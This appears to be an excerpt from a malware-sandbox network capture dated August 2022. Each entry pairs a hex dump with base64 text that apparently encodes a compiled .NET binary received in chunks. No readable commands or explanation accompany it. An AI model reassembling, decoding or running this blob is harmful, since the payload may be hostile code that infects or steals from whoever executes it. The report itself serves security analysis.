                                2022-08-08 10:54:13 UTC78INData Raw: 41 41 47 62 37 49 42 41 41 6f 6f 45 51 41 41 43 68 4d 49 45 51 68 76 63 77 45 41 43 74 41 56 41 41 41 42 4b 42 51 41 41 41 6f 7a 45 78 45 4b 45 51 67 6f 6e 41 41 41 43 6d 38 6b 41 67 41 47 4f 4c 6f 41 41 41 41 52 42 68 51 6f 68 41 49 41 42 68 65 4e 42 77 41 41 41 52 4d 57 45 52 59 57 45 51 67 6f 45 51 41 41 43 71 49 52 46 68 4d 58 45 52 63 55 46 42 65 4e 4c 77 41 41 41 52 4d 59 45 52 67 57 46 35 77 52 47 43 69 6a 41 41 41 4b 45 52 67 57 6b 43 77 4c 45 52 63 57 6d 69 67 52 41 41 41 4b 45 77 68 30 45 67 41 41 47 78 4d 4c 45 51 6f 52 42 68 45 4c 62 78 63 42 41 41 70 76 48 67 45 41 43 68 59 6f 37 67 45 41 43 69 6a 55 41 51 41 4b 4b 43 34 43 41 41 5a 76 65 41 41 41 43 6d 38 6b 41 67 41 47 33 6a 38 6f 4e 77 41 41 43 68 45 49 64 42 49 41 41 42 73 54 43 78 45 4b
                                Data Ascii: AAGb7IBAAooEQAAChMIEQhvcwEACtAVAAABKBQAAAozExEKEQgonAAACm8kAgAGOLoAAAARBhQohAIABheNBwAAARMWERYWEQgoEQAACqIRFhMXERcUFBeNLwAAARMYERgWF5wRGCijAAAKERgWkCwLERcWmigRAAAKEwh0EgAAGxMLEQoRBhELbxcBAApvHgEAChYo7gEACijUAQAKKC4CAAZveAAACm8kAgAG3j8oNwAAChEIdBIAABsTCxEK
                                2022-08-08 10:54:13 UTC86INData Raw: 68 4d 49 45 51 67 6f 6e 41 41 41 43 69 69 50 41 51 41 4b 4c 57 56 7a 49 67 49 41 42 68 4d 4a 45 51 6b 49 45 51 52 76 41 41 49 41 43 6e 73 44 41 67 41 4b 62 79 6f 43 41 41 59 52 43 52 45 49 46 43 69 4c 42 41 41 47 46 6f 30 48 41 41 41 42 46 42 51 55 4b 4b 4d 41 41 41 6f 6f 6e 41 41 41 43 6d 38 6d 41 67 41 47 45 51 6b 49 45 51 52 76 41 41 49 41 43 6e 73 43 41 67 41 4b 62 79 67 43 41 41 59 52 43 53 67 75 41 67 41 47 62 79 51 43 41 41 59 47 45 51 6c 76 45 67 45 41 43 74 34 4d 4b 44 63 41 41 41 6f 6f 4f 41 41 41 43 74 34 41 45 51 51 58 31 68 4d 45 45 51 51 52 45 6a 37 51 2f 76 2f 2f 63 2f 73 42 41 41 6f 4e 43 53 69 4d 42 41 41 47 4b 49 30 45 41 41 59 6f 49 77 41 41 43 69 69 4f 42 41 41 47 4b 43 51 41 41 41 6f 6f 6a 77 51 41 42 6e 50 38 41 51 41 4b 62 2f 30 42
                                Data Ascii: hMIEQgonAAACiiPAQAKLWVzIgIABhMJEQkIEQRvAAIACnsDAgAKbyoCAAYRCREIFCiLBAAGFo0HAAABFBQUKKMAAAoonAAACm8mAgAGEQkIEQRvAAIACnsCAgAKbygCAAYRCSguAgAGbyQCAAYGEQlvEgEACt4MKDcAAAooOAAACt4AEQQX1hMEEQQREj7Q/v//c/sBAAoNCSiMBAAGKI0EAAYoIwAACiiOBAAGKCQAAAoojwQABnP8AQAKb/0B
                                2022-08-08 10:54:13 UTC94INData Raw: 67 45 41 43 74 34 56 4a 53 67 33 41 41 41 4b 45 77 78 7a 75 67 41 41 43 67 73 6f 4f 41 41 41 43 74 34 43 42 69 6f 48 4b 67 41 41 41 52 41 41 41 41 41 41 4d 41 44 68 45 51 45 56 47 67 41 41 41 52 73 77 42 41 41 75 41 41 41 41 49 41 41 41 45 53 69 58 41 41 41 4b 41 69 68 6d 41 51 41 4b 46 42 63 6f 6b 67 45 41 43 6d 38 58 41 51 41 4b 43 74 34 53 4b 44 63 41 41 41 6f 6f 4c 67 49 41 42 67 6f 6f 4f 41 41 41 43 74 34 41 42 69 6f 41 41 41 45 51 41 41 41 41 41 41 41 41 47 68 6f 41 45 68 6f 41 41 41 45 62 4d 41 51 41 49 77 41 41 41 43 41 41 41 42 45 6f 6c 77 41 41 43 67 49 55 46 69 69 53 41 51 41 4b 62 78 63 42 41 41 6f 4b 33 67 77 6f 4e 77 41 41 43 69 67 34 41 41 41 4b 33 67 41 47 4b 67 41 42 45 41 41 41 41 41 41 41 41 42 55 56 41 41 77 61 41 41 41 42 48 67 49 6f
                                Data Ascii: gEACt4VJSg3AAAKEwxzugAACgsoOAAACt4CBioHKgAAARAAAAAAMADhEQEVGgAAARswBAAuAAAAIAAAESiXAAAKAihmAQAKFBcokgEACm8XAQAKCt4SKDcAAAooLgIABgooOAAACt4ABioAAAEQAAAAAAAAGhoAEhoAAAEbMAQAIwAAACAAABEolwAACgIUFiiSAQAKbxcBAAoK3gwoNwAACig4AAAK3gAGKgABEAAAAAAAABUVAAwaAAABHgIo
                                2022-08-08 10:54:13 UTC101INData Raw: 78 67 54 42 41 41 52 42 42 6e 2b 41 53 77 51 41 68 64 76 4e 41 49 41 43 69 67 31 41 67 41 4b 43 78 6f 54 42 41 41 52 42 42 6a 2b 41 53 77 51 41 68 5a 76 4e 41 49 41 43 69 67 31 41 67 41 4b 43 68 6b 54 42 41 41 52 42 42 72 2b 41 53 77 62 49 50 38 41 41 41 41 47 47 6d 49 48 31 69 43 6a 41 41 41 41 59 53 44 2f 41 41 41 41 58 32 45 4e 47 78 4d 45 41 42 45 45 46 76 34 42 4c 41 4d 58 45 77 51 41 45 51 51 62 2f 67 45 73 41 69 73 43 4b 34 73 4a 4b 67 41 62 4d 41 4d 41 36 77 49 41 41 4b 38 41 41 42 45 43 66 70 4d 41 41 41 6f 57 4b 43 34 41 41 41 6f 57 4c 69 41 44 66 70 4d 41 41 41 6f 57 4b 43 34 41 41 41 6f 57 4d 77 49 72 44 77 52 2b 6b 77 41 41 43 68 59 6f 4c 67 41 41 43 68 59 7a 43 79 67 75 41 67 41 47 43 74 32 76 41 67 41 41 41 78 4d 48 63 37 77 41 41 41 6f 4c
                                Data Ascii: xgTBAARBBn+ASwQAhdvNAIACig1AgAKCxoTBAARBBj+ASwQAhZvNAIACig1AgAKChkTBAARBBr+ASwbIP8AAAAGGmIH1iCjAAAAYSD/AAAAX2ENGxMEABEEFv4BLAMXEwQAEQQb/gEsAisCK4sJKgAbMAMA6wIAAK8AABECfpMAAAoWKC4AAAoWLiADfpMAAAoWKC4AAAoWMwIrDwR+kwAAChYoLgAAChYzCyguAgAGCt2vAgAAAxMHc7wAAAoL
                                2022-08-08 10:54:13 UTC109INData Raw: 6f 38 70 41 41 41 43 65 38 34 41 41 41 51 66 43 57 6f 2b 6c 51 41 41 41 41 49 52 42 52 45 48 4b 46 6f 41 41 41 71 50 4b 51 41 41 41 6e 76 4f 41 41 41 45 62 34 4d 42 41 41 59 73 50 52 45 46 45 51 63 6f 57 67 41 41 43 6f 38 70 41 41 41 43 45 51 55 52 42 79 68 61 41 41 41 4b 6a 79 6b 41 41 41 4a 37 7a 67 41 41 42 42 38 4e 61 74 70 73 49 77 41 41 41 41 41 41 41 41 42 41 57 79 69 52 41 41 41 4b 75 58 33 4e 41 41 41 45 4b 32 77 52 42 52 45 48 4b 46 6f 41 41 41 71 50 4b 51 41 41 41 68 45 46 45 51 63 6f 57 67 41 41 43 6f 38 70 41 41 41 43 65 38 34 41 41 41 51 66 44 47 72 61 62 43 4d 41 41 41 41 41 41 41 41 41 51 46 73 6f 6b 51 41 41 43 72 6c 39 7a 51 41 41 42 43 73 76 45 51 55 52 42 79 68 61 41 41 41 4b 6a 79 6b 41 41 41 49 43 65 38 6f 41 41 41 51 52 42 52 45 48
                                Data Ascii: o8pAAACe84AAAQfCWo+lQAAAAIRBREHKFoAAAqPKQAAAnvOAAAEb4MBAAYsPREFEQcoWgAACo8pAAACEQURByhaAAAKjykAAAJ7zgAABB8NatpsIwAAAAAAAABAWyiRAAAKuX3NAAAEK2wRBREHKFoAAAqPKQAAAhEFEQcoWgAACo8pAAACe84AAAQfDGrabCMAAAAAAAAAQFsokQAACrl9zQAABCsvEQURByhaAAAKjykAAAICe8oAAAQRBREH
                                2022-08-08 10:54:13 UTC117INData Raw: 68 4d 50 45 77 73 34 7a 77 41 41 41 41 4a 37 33 41 41 41 42 42 45 4c 6d 68 4d 4e 41 6e 76 63 41 41 41 45 45 51 73 58 31 70 6f 54 44 41 4a 37 33 51 41 41 42 43 78 4f 45 51 59 52 44 42 51 6f 31 77 51 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 4a 77 41 41 41 6f 52 44 42 51 6f 76 67 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 6f 52 44 58 51 79 41 41 41 43 41 6e 76 5a 41 41 41 45 4b 48 55 41 41 41 59 54 43 69 74 48 45 51 59 52 44 42 51 6f 31 77 51 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 4a 77 41 41 41 6f 52 44 42 51 6f 76 67 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 6f 52 44 58 51 79 41 41 41 43 46 43 68 31 41 41 41 47 45 77 6f 52
                                Data Ascii: hMPEws4zwAAAAJ73AAABBELmhMNAnvcAAAEEQsX1poTDAJ73QAABCxOEQYRDBQo1wQABhaNBwAAARQUFCijAAAKKJwAAAoRDBQovgIABhaNBwAAARQUFCijAAAKKFoAAAoRDXQyAAACAnvZAAAEKHUAAAYTCitHEQYRDBQo1wQABhaNBwAAARQUFCijAAAKKJwAAAoRDBQovgIABhaNBwAAARQUFCijAAAKKFoAAAoRDXQyAAACFCh1AAAGEwoR
                                2022-08-08 10:54:13 UTC125INData Raw: 78 38 52 45 77 55 41 45 51 55 57 2f 67 45 73 41 78 63 54 42 51 41 52 42 52 38 58 2f 67 45 73 41 69 73 46 4f 4f 6e 39 2f 2f 38 71 45 7a 41 46 41 41 55 43 41 41 44 59 41 41 41 52 41 6e 73 51 41 51 41 45 4c 51 73 6f 77 67 51 41 42 6e 4f 44 41 67 41 4b 65 6e 4e 2f 41 67 41 4b 44 42 59 4b 4f 4e 55 42 41 41 41 43 65 78 41 42 41 41 51 47 4b 42 45 42 41 41 6f 54 45 42 45 51 62 69 42 51 53 77 45 43 61 6b 44 48 41 51 41 41 41 6e 73 51 41 51 41 45 42 68 37 57 4b 49 73 43 41 41 6f 67 41 41 67 41 41 46 38 57 2f 67 45 57 2f 67 45 54 42 77 4a 37 45 41 45 41 42 41 59 66 43 74 59 6f 69 77 49 41 43 68 4d 4e 41 6e 73 51 41 51 41 45 42 68 38 4d 31 69 67 52 41 51 41 4b 45 77 34 43 65 78 41 42 41 41 51 47 48 78 44 57 4b 42 45 42 41 41 6f 54 42 51 4a 37 45 41 45 41 42 41 59 66
                                Data Ascii: x8REwUAEQUW/gEsAxcTBQARBR8X/gEsAisFOOn9//8qEzAFAAUCAADYAAARAnsQAQAELQsowgQABnODAgAKenN/AgAKDBYKONUBAAACexABAAQGKBEBAAoTEBEQbiBQSwECakDHAQAAAnsQAQAEBh7WKIsCAAogAAgAAF8W/gEW/gETBwJ7EAEABAYfCtYoiwIAChMNAnsQAQAEBh8M1igRAQAKEw4CexABAAQGHxDWKBEBAAoTBQJ7EAEABAYf
                                2022-08-08 10:54:13 UTC133INData Raw: 67 41 4b 48 77 38 4d 41 41 67 66 44 2f 34 42 4c 42 73 44 66 43 4d 42 41 41 51 6f 70 77 49 41 43 69 69 63 41 67 41 4b 42 68 38 34 62 36 59 43 41 41 6f 66 45 41 77 41 43 42 38 4d 2f 67 45 73 45 52 63 6f 6d 51 49 41 43 67 59 66 4c 47 2b 6d 41 67 41 4b 48 77 30 4d 41 41 67 66 43 2f 34 42 4c 42 49 66 49 43 69 5a 41 67 41 4b 42 68 38 6d 62 36 59 43 41 41 6f 66 44 41 77 41 43 42 33 2b 41 53 77 56 41 33 73 62 41 51 41 45 4b 4a 77 43 41 41 6f 47 48 77 78 76 70 67 49 41 43 68 34 4d 41 41 67 57 2f 67 45 73 41 68 63 4d 41 41 67 66 45 66 34 42 4c 41 49 72 42 54 68 4d 2f 76 2f 2f 42 69 6f 41 41 41 41 54 4d 41 51 41 6b 67 49 41 41 4f 51 41 41 42 45 57 45 77 67 34 68 41 49 41 41 41 41 52 43 42 38 53 2f 67 45 73 44 41 63 66 43 6b 42 38 41 41 41 41 48 78 4d 54 43 41 41 52
                                Data Ascii: gAKHw8MAAgfD/4BLBsDfCMBAAQopwIACiicAgAKBh84b6YCAAofEAwACB8M/gEsERcomQIACgYfLG+mAgAKHw0MAAgfC/4BLBIfICiZAgAKBh8mb6YCAAofDAwACB3+ASwVA3sbAQAEKJwCAAoGHwxvpgIACh4MAAgW/gEsAhcMAAgfEf4BLAIrBThM/v//BioAAAATMAQAkgIAAOQAABEWEwg4hAIAAAARCB8S/gEsDAcfCkB8AAAAHxMTCAAR
                                2022-08-08 10:54:13 UTC140INData Raw: 77 6b 6f 56 77 49 41 42 6d 39 73 41 67 41 4b 4a 68 34 54 42 51 41 52 42 52 37 2b 41 53 77 63 43 51 59 49 6a 79 73 41 41 41 45 6f 45 51 55 41 42 69 6a 44 41 67 41 4b 62 32 77 43 41 41 6f 6d 48 77 6b 54 42 51 41 52 42 52 76 2b 41 53 77 49 4f 49 34 41 41 41 41 63 45 77 55 41 45 51 55 61 2f 67 45 73 44 42 59 47 6a 72 63 58 32 68 4d 45 44 42 73 54 42 51 41 52 42 52 38 4a 2f 67 45 73 43 41 67 58 31 67 77 66 43 68 4d 46 41 42 45 46 46 2f 34 42 4c 41 4d 59 45 77 55 41 45 51 55 63 2f 67 45 73 48 41 67 59 58 52 62 2b 41 51 67 47 6a 72 63 58 32 76 34 42 46 76 34 42 58 77 67 57 2f 67 4a 66 4c 49 4d 64 45 77 55 41 45 51 55 59 2f 67 45 73 46 51 49 6f 6c 77 41 41 43 67 4e 76 6d 41 41 41 43 6d 38 69 41 51 41 4b 43 68 6b 54 42 51 41 52 42 52 6e 2b 41 53 77 4a 63 37 6b 41
                                Data Ascii: wkoVwIABm9sAgAKJh4TBQARBR7+ASwcCQYIjysAAAEoEQUABijDAgAKb2wCAAomHwkTBQARBRv+ASwIOI4AAAAcEwUAEQUa/gEsDBYGjrcX2hMEDBsTBQARBR8J/gEsCAgX1gwfChMFABEFF/4BLAMYEwUAEQUc/gEsHAgYXRb+AQgGjrcX2v4BFv4BXwgW/gJfLIMdEwUAEQUY/gEsFQIolwAACgNvmAAACm8iAQAKChkTBQARBRn+ASwJc7kA
                                2022-08-08 10:54:13 UTC148INData Raw: 52 4d 4e 41 42 45 4e 46 76 34 42 4c 41 4d 58 45 77 30 41 45 51 30 66 47 2f 34 42 4c 41 49 72 42 54 68 76 2f 50 2f 2f 41 67 4a 37 52 41 45 41 42 47 34 58 61 74 61 34 66 55 51 42 41 41 51 47 4b 68 4d 77 42 67 41 7a 41 51 41 41 2b 51 41 41 45 52 59 54 42 7a 67 66 41 51 41 41 41 42 45 48 47 76 34 42 4c 41 73 61 6a 53 73 41 41 41 45 54 42 68 73 54 42 77 41 52 42 78 66 2b 41 53 77 44 47 42 4d 48 41 42 45 48 48 66 34 42 4c 43 63 52 42 68 67 47 46 34 30 48 41 41 41 42 45 77 51 52 42 42 59 58 6a 44 38 41 41 41 47 69 45 51 51 55 4b 4b 30 41 41 41 6f 6f 33 51 49 41 43 70 77 65 45 77 63 41 45 51 63 62 2f 67 45 73 4a 42 45 47 46 67 59 58 6a 51 63 41 41 41 45 4d 43 42 59 5a 6a 44 38 41 41 41 47 69 43 42 51 6f 72 51 41 41 43 69 6a 64 41 67 41 4b 6e 42 77 54 42 77 41 52
                                Data Ascii: RMNABENFv4BLAMXEw0AEQ0fG/4BLAIrBThv/P//AgJ7RAEABG4Xata4fUQBAAQGKhMwBgAzAQAA+QAAERYTBzgfAQAAABEHGv4BLAsajSsAAAETBhsTBwARBxf+ASwDGBMHABEHHf4BLCcRBhgGF40HAAABEwQRBBYXjD8AAAGiEQQUKK0AAAoo3QIACpweEwcAEQcb/gEsJBEGFgYXjQcAAAEMCBYZjD8AAAGiCBQorQAACijdAgAKnBwTBwAR
                                2022-08-08 10:54:13 UTC156INData Raw: 77 34 52 44 6e 35 4d 41 51 41 45 45 51 38 6f 48 41 49 41 42 68 4d 4c 63 79 49 43 41 41 59 54 45 42 45 51 43 47 38 6f 41 67 41 47 45 52 41 52 44 43 67 75 42 51 41 47 4b 43 34 43 41 41 59 6f 36 77 49 41 43 6d 38 6b 41 67 41 47 45 52 41 52 43 79 67 75 42 51 41 47 4b 43 34 43 41 41 59 6f 36 77 49 41 43 6d 38 6d 41 67 41 47 45 52 41 44 62 79 6f 43 41 41 59 47 45 52 42 76 45 67 45 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 78 51 6f 4f 41 41 41 43 74 34 41 45 51 6f 58 31 68 4d 4b 45 51 6f 52 46 7a 35 31 2f 76 2f 2f 45 52 55 58 31 68 4d 56 45 52 55 52 46 6f 36 33 50 2b 76 39 2f 2f 38 47 4b 67 42 42 4e 41 41 41 41 41 41 41 41 46 4d 41 41 41 41 4c 41 41 41 41 58 67 41 41 41 42 49 41 41 41 41 61 41 41 41 42 41 41 41 41 41 4a 30 41 41 41 42 74 41 51 41 41 43 67 49 41
                                Data Ascii: w4RDn5MAQAEEQ8oHAIABhMLcyICAAYTEBEQCG8oAgAGERARDCguBQAGKC4CAAYo6wIACm8kAgAGERARCyguBQAGKC4CAAYo6wIACm8mAgAGERADbyoCAAYGERBvEgEACt4PJSg3AAAKExQoOAAACt4AEQoX1hMKEQoRFz51/v//ERUX1hMVERURFo63P+v9//8GKgBBNAAAAAAAAFMAAAALAAAAXgAAABIAAAAaAAABAAAAAJ0AAABtAQAACgIA
                                2022-08-08 10:54:13 UTC164INData Raw: 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 49 41 41 41 43 61 4a 53 30 53 4a 69 43 43 41 41 41 41 49 45 73 47 41 41 41 66 48 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 44 41 41 41 41 6d 69 55 74 45 53 59 67 67 77 41 41 41 43 42 70 42 67 41 41 48 43 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 43 45 41 41 41 41 6d 69 55 74 45 69 59 67 68 41 41 41 41 43 42 76 42 67 41 41 48 78 67 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 68 51 41 41 41 4a 6f 6c 4c 52 49 6d 49 49 55 41 41 41 41 67 68 77 59 41 41 42 38 4b 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 59 41 41 41 43 61 4a 53 30 53 4a 69 43 47 41 41 41 41 49 4a 45 47 41 41 41 66 4d 79 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 48 41 41 41 41 6d 69 55 74 45 53 59 67
                                Data Ascii: C0CAAYqhn6ZAQAEIIIAAACaJS0SJiCCAAAAIEsGAAAfHigtAgAGKoJ+mQEABCCDAAAAmiUtESYggwAAACBpBgAAHCgtAgAGKoZ+mQEABCCEAAAAmiUtEiYghAAAACBvBgAAHxgoLQIABiqGfpkBAAQghQAAAJolLRImIIUAAAAghwYAAB8KKC0CAAYqhn6ZAQAEIIYAAACaJS0SJiCGAAAAIJEGAAAfMygtAgAGKoJ+mQEABCCHAAAAmiUtESYg
                                2022-08-08 10:54:13 UTC172INData Raw: 41 45 41 41 43 42 7a 45 51 41 41 48 77 6f 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 4e 51 45 41 41 4a 6f 6c 4c 52 49 6d 49 44 55 42 41 41 41 67 66 52 45 41 41 42 38 4f 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 44 59 42 41 41 43 61 4a 53 30 53 4a 69 41 32 41 51 41 41 49 49 73 52 41 41 41 66 44 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 41 33 41 51 41 41 6d 69 55 74 45 53 59 67 4e 77 45 41 41 43 43 5a 45 51 41 41 47 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 41 34 41 51 41 41 6d 69 55 74 45 53 59 67 4f 41 45 41 41 43 43 63 45 51 41 41 47 53 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 41 35 41 51 41 41 6d 69 55 74 45 69 59 67 4f 51 45 41 41 43 43 66 45 51 41 41 48 77 77 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67
                                Data Ascii: AEAACBzEQAAHwooLQIABiqGfpkBAAQgNQEAAJolLRImIDUBAAAgfREAAB8OKC0CAAYqhn6ZAQAEIDYBAACaJS0SJiA2AQAAIIsRAAAfDigtAgAGKoJ+mQEABCA3AQAAmiUtESYgNwEAACCZEQAAGSgtAgAGKoJ+mQEABCA4AQAAmiUtESYgOAEAACCcEQAAGSgtAgAGKoZ+mQEABCA5AQAAmiUtEiYgOQEAACCfEQAAHwwoLQIABiqGfpkBAAQg
                                2022-08-08 10:54:13 UTC179INData Raw: 70 6b 42 41 41 51 67 35 77 45 41 41 4a 6f 6c 4c 52 49 6d 49 4f 63 42 41 41 41 67 75 78 73 41 41 42 38 4c 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4f 67 42 41 41 43 61 4a 53 30 52 4a 69 44 6f 41 51 41 41 49 4d 59 62 41 41 41 63 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4f 6b 42 41 41 43 61 4a 53 30 52 4a 69 44 70 41 51 41 41 49 4d 77 62 41 41 41 64 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 4f 6f 42 41 41 43 61 4a 53 30 53 4a 69 44 71 41 51 41 41 49 4e 4d 62 41 41 41 66 43 69 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 44 72 41 51 41 41 6d 69 55 74 45 69 59 67 36 77 45 41 41 43 44 64 47 77 41 41 48 77 73 6f 4c 51 49 41 42 69 71 43 66 70 6b 42 41 41 51 67 37 41 45 41 41 4a 6f 6c 4c 52 45 6d 49 4f 77 42 41 41 41 67 36 42 73 41
                                Data Ascii: pkBAAQg5wEAAJolLRImIOcBAAAguxsAAB8LKC0CAAYqgn6ZAQAEIOgBAACaJS0RJiDoAQAAIMYbAAAcKC0CAAYqgn6ZAQAEIOkBAACaJS0RJiDpAQAAIMwbAAAdKC0CAAYqhn6ZAQAEIOoBAACaJS0SJiDqAQAAINMbAAAfCigtAgAGKoZ+mQEABCDrAQAAmiUtEiYg6wEAACDdGwAAHwsoLQIABiqCfpkBAAQg7AEAAJolLREmIOwBAAAg6BsA
                                2022-08-08 10:54:13 UTC187INData Raw: 41 41 59 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 6f 43 41 41 43 61 4a 53 30 52 4a 69 43 61 41 67 41 41 49 4f 63 6d 41 41 41 58 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 73 43 41 41 43 61 4a 53 30 52 4a 69 43 62 41 67 41 41 49 4f 67 6d 41 41 41 59 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 77 43 41 41 43 61 4a 53 30 52 4a 69 43 63 41 67 41 41 49 4f 6f 6d 41 41 41 63 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 30 43 41 41 43 61 4a 53 30 52 4a 69 43 64 41 67 41 41 49 50 41 6d 41 41 41 58 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 34 43 41 41 43 61 4a 53 30 52 4a 69 43 65 41 67 41 41 49 50 45 6d 41 41 41 65 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 38 43 41 41 43 61 4a 53 30 52 4a 69 43 66
                                Data Ascii: AAYKC0CAAYqgn6ZAQAEIJoCAACaJS0RJiCaAgAAIOcmAAAXKC0CAAYqgn6ZAQAEIJsCAACaJS0RJiCbAgAAIOgmAAAYKC0CAAYqgn6ZAQAEIJwCAACaJS0RJiCcAgAAIOomAAAcKC0CAAYqgn6ZAQAEIJ0CAACaJS0RJiCdAgAAIPAmAAAXKC0CAAYqgn6ZAQAEIJ4CAACaJS0RJiCeAgAAIPEmAAAeKC0CAAYqgn6ZAQAEIJ8CAACaJS0RJiCf
                                2022-08-08 10:54:13 UTC195INData Raw: 47 4e 36 51 6e 77 50 48 41 30 62 50 79 59 38 54 54 45 57 45 67 63 33 4c 6a 52 46 4b 51 34 4b 48 79 49 71 44 78 67 41 55 7a 51 51 41 68 59 33 47 69 55 38 4a 79 63 4e 49 43 4d 36 4c 53 30 63 41 69 6b 6f 4d 79 6f 30 42 77 30 71 4f 79 31 38 47 54 4d 6e 4d 52 41 47 42 78 41 55 2f 75 72 30 36 73 48 64 79 65 76 32 38 2f 7a 53 7a 39 50 42 31 70 54 53 33 4d 48 32 39 50 6e 6b 37 66 44 6c 34 2b 54 79 2b 75 48 56 33 74 76 4d 33 4e 50 66 34 75 54 33 39 2b 44 30 34 74 6a 44 7a 73 76 50 2b 4f 7a 36 77 4e 37 64 77 64 58 58 77 73 66 49 78 6f 4f 66 6a 5a 71 79 70 34 4f 65 6c 71 75 72 70 4c 2b 34 70 37 43 6f 71 62 32 33 71 71 43 70 72 72 65 68 6f 35 36 51 67 34 4f 55 75 4b 36 4f 6e 5a 36 59 72 62 2b 6e 67 49 2b 54 67 34 47 51 6c 59 6d 79 72 4c 79 74 6a 37 4f 76 70 6f 61 6a
                                Data Ascii: GN6QnwPHA0bPyY8TTEWEgc3LjRFKQ4KHyIqDxgAUzQQAhY3GiU8JycNICM6LS0cAikoMyo0Bw0qOy18GTMnMRAGBxAU/ur06sHdyev28/zSz9PB1pTS3MH29Pnk7fDl4+Ty+uHV3tvM3NPf4uT39+D04tjDzsvP+Oz6wN7dwdXXwsfIxoOfjZqyp4OelqurpL+4p7Coqb23qqCprreho56Qg4OUuK6OnZ6Yrb+ngI+Tg4GQlYmyrLytj7Ovpoaj
                                2022-08-08 10:54:13 UTC203INData Raw: 4c 53 30 73 4c 43 73 72 4b 43 67 33 39 33 66 32 64 66 56 31 39 6e 66 33 64 2f 5a 70 36 57 6e 75 62 2b 39 76 37 6d 33 74 62 65 35 76 37 32 46 68 35 6d 66 6e 5a 2b 5a 6c 35 57 58 6d 5a 2b 64 6e 35 6d 48 68 59 65 35 76 37 32 2f 75 62 65 31 74 35 36 58 71 4b 54 6d 68 61 57 78 2b 34 65 5a 75 72 32 77 71 62 4f 6d 2f 5a 4f 58 6d 4b 32 75 72 79 6f 72 4b 48 31 47 53 6d 35 4d 56 6d 74 72 5a 48 39 34 5a 33 42 6f 61 58 31 33 61 6d 42 70 62 6e 64 68 62 47 4a 5a 55 55 42 43 61 33 6c 74 56 56 78 6d 59 55 78 77 64 33 4e 64 52 44 56 59 56 6e 39 76 62 48 42 77 65 47 39 5a 63 32 64 78 56 58 39 6c 55 6e 6f 47 44 77 30 62 51 41 4d 66 47 54 34 75 41 51 67 4b 42 51 73 64 56 42 49 57 45 44 38 63 48 78 49 48 48 51 51 69 4f 79 4d 6b 4a 69 38 35 50 69 77 38 41 69 30 6b 4c 67 49 6b
                                Data Ascii: LS0sLCsrKCg393f2dfV19nf3d/Zp6Wnub+9v7m3tbe5v72Fh5mfnZ+Zl5WXmZ+dn5mHhYe5v72/ube1t56XqKTmhaWx+4eZur2wqbOm/ZOXmK2uryorKH1GSm5MVmtrZH94Z3BoaX13amBpbndhbGJZUUBCa3ltVVxmYUxwd3NdRDVYVn9vbHBweG9Zc2dxVX9lUnoGDw0bQAMfGT4uAQgKBQsdVBIWED8cHxIHHQQiOyMkJi85Piw8Ai0kLgIk
                                2022-08-08 10:54:13 UTC211INData Raw: 4d 34 68 57 67 51 47 41 4f 73 41 72 52 6f 53 41 44 49 75 47 69 30 47 41 41 6b 41 4b 44 4d 47 41 4e 6f 41 4b 44 4d 61 41 45 45 71 52 79 34 61 41 48 63 64 52 79 34 61 41 4f 77 47 52 79 34 47 41 4a 38 41 58 41 63 47 41 4b 6f 59 4b 44 4d 47 41 45 49 6e 4a 78 30 47 41 48 38 69 72 52 6f 47 41 4e 73 68 4b 44 4d 47 41 41 51 42 4b 44 4d 53 41 4c 38 52 43 68 6b 47 41 4c 30 4c 72 52 6f 47 41 42 63 53 66 53 59 47 41 4a 63 53 66 53 59 47 41 42 6f 52 4e 79 59 41 41 41 41 41 50 51 45 41 41 41 41 41 41 51 41 42 41 41 41 41 41 41 43 58 41 5a 63 42 42 51 41 42 41 41 45 41 41 41 41 41 41 50 63 47 6c 77 45 56 41 41 45 41 41 67 41 41 41 52 41 41 78 41 47 58 41 52 30 41 41 51 41 44 41 41 55 42 41 41 43 58 41 51 41 41 48 51 41 46 41 41 67 41 42 51 45 41 41 41 34 41 41 41 41 64
                                Data Ascii: M4hWgQGAOsArRoSADIuGi0GAAkAKDMGANoAKDMaAEEqRy4aAHcdRy4aAOwGRy4GAJ8AXAcGAKoYKDMGAEInJx0GAH8irRoGANshKDMGAAQBKDMSAL8RChkGAL0LrRoGABcSfSYGAJcSfSYGABoRNyYAAAAAPQEAAAAAAQABAAAAAACXAZcBBQABAAEAAAAAAPcGlwEVAAEAAgAAARAAxAGXAR0AAQADAAUBAACXAQAAHQAFAAgABQEAAA4AAAAd
